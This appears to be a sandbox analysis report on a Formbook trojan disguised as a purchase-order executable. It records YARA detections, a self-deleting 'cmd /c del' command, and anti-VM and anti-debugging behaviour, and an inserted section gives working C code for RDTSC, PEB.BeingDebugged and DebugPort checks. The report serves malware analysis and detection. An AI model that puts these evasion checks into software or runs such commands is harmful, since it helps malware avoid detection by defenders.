          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@17/13
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: Purchase Order 40,7045$.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Purchase Order 40,7045$.exe | Virustotal: Detection: 43%
          Source: Purchase Order 40,7045$.exe | ReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: Purchase Order 40,7045$.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E0595 push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013DD44F push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00415913 push edx; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AC62 push D8D19732h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414D57 push esi; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AD65 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414DEA push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041ADB2 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041ADBB push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414E7E push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AE1C push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414E24 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0040FF92 push 00000033h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02ECD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B15913 push edx; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14E24 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AE1C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14E7E push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B0FF92 push 00000033h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AC62 push D8D19732h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1ADB2 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1ADBB push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14DEA push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AD65 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14D57 push esi; retf

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_004086A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5636 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00409900 LdrLoadDll,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
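          The rdtsc interceptor hits, the DebugPort queries, the IsDebuggerPresent import and the long run of fs:[00000030h] reads in this section are three user-mode anti-analysis checks seen from different angles: a back-to-back RDTSC pair to spot a hypervisor that traps the instruction, a read of PEB.BeingDebugged (what IsDebuggerPresent returns, reached inline through the fs:[30h] PEB pointer), and NtQueryInformationProcess(ProcessDebugPort). The C below is an added example written for this page, not code recovered from the sample and not produced by the sandbox; it implements the three checks with the decision logic kept separate from the Windows-only reads, so it compiles on any platform and runs in full only on Windows. The 0x500-tick threshold and the function names are this example's own assumptions.

```c
/*
 * Added example (not code from the analysed sample or from the sandbox):
 * the three anti-analysis checks the report attributes to the sample,
 * written next to their API-level equivalents.
 *
 *   1. RDTSC pair   -> "RDTSC instruction interceptor" / "rdtsc" evidence
 *   2. fs:[30h]     -> "mov eax, dword ptr fs:[00000030h]" (PEB reads)
 *   3. DebugPort    -> "Process queried: DebugPort"
 *
 * Windows-specific reads are compiled only under _WIN32; everything else is
 * portable and is what the test exercises.
 */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#  include <x86intrin.h>   /* __rdtsc() on GCC/clang */
#  define HAVE_RDTSC 1
#elif defined(_M_X64) || defined(_M_IX86)
#  include <intrin.h>      /* __rdtsc() on MSVC */
#  define HAVE_RDTSC 1
#else
#  define HAVE_RDTSC 0
#endif

#ifdef _WIN32
#  include <windows.h>
#  include <winternl.h>    /* PEB, TEB, PROCESSINFOCLASS (ProcessDebugPort = 7) */
#endif

/* Threshold in TSC ticks. 0x500 is an assumed value for this example: two
 * consecutive RDTSCs cost tens of ticks on bare metal, while a hypervisor
 * configured to trap RDTSC adds a VM exit of thousands of ticks. */
#define RDTSC_VM_THRESHOLD 0x500u

/* Pure decision: is the gap between two consecutive RDTSCs large enough
 * that the instruction was probably trapped or emulated? */
int rdtsc_delta_suspicious(uint64_t delta, uint64_t threshold)
{
    return delta > threshold;
}

/* The flagged pattern, "rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc", keeps the
 * low 32 bits of the first reading and reads again. Here the full 64-bit
 * counter is used; the comparison is the same. Returns 0 where there is no
 * TSC, which callers should treat as "no signal", not "bare metal". */
uint64_t rdtsc_pair_delta(void)
{
#if HAVE_RDTSC
    uint64_t first  = __rdtsc();
    uint64_t second = __rdtsc();
    return second - first;
#else
    return 0;
#endif
}

/* PEB->BeingDebugged, the byte IsDebuggerPresent() returns. The sample reads
 * it inline via fs:[30h] (the PEB pointer in the 32-bit TEB); NtCurrentTeb()
 * reaches the same structure through documented headers.
 * Returns 1/0, or -1 on a non-Windows build. */
int peb_being_debugged(void)
{
#ifdef _WIN32
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    return peb->BeingDebugged ? 1 : 0;
#else
    return -1;
#endif
}

/* ProcessDebugPort is non-zero while a debugger is attached. The function is
 * resolved at run time with GetProcAddress, the same "dynamically determine
 * API calls" behaviour the report lists. Returns 1/0, or -1 if unavailable. */
int debug_port_attached(void)
{
#ifdef _WIN32
    typedef NTSTATUS (NTAPI *NtQIP_t)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    if (!ntdll) return -1;
    NtQIP_t NtQIP = (NtQIP_t)GetProcAddress(ntdll, "NtQueryInformationProcess");
    if (!NtQIP) return -1;
    ULONG_PTR port = 0;
    NTSTATUS st = NtQIP(GetCurrentProcess(), ProcessDebugPort, &port, sizeof port, NULL);
    if (st < 0) return -1;            /* NTSTATUS failure codes are negative */
    return port != 0;
#else
    return -1;
#endif
}

int main(void)
{
    uint64_t d = rdtsc_pair_delta();
    printf("rdtsc delta     : %llu ticks -> %s\n", (unsigned long long)d,
           rdtsc_delta_suspicious(d, RDTSC_VM_THRESHOLD) ? "suspicious" : "plausible bare metal");
    printf("PEB.BeingDebugged: %d\n", peb_being_debugged());
    printf("ProcessDebugPort : %d\n", debug_port_attached());
    return 0;
}
```

          Two caveats a practitioner should keep in mind. A single RDTSC pair is noisy (a context switch or frequency change between the two reads produces a large delta on real hardware), so real samples usually repeat the pair and take the minimum; the sandbox's "interceptor" hooks exactly this pair so it can return a small delta. PEB.BeingDebugged and the debug port are trivially cleared or hooked by analysis tooling, so for the defender these checks matter less as evasions than as static hunting signals: back-to-back rdtsc in user code and direct fs:[30h] reads outside the CRT are rare in legitimate software.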
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
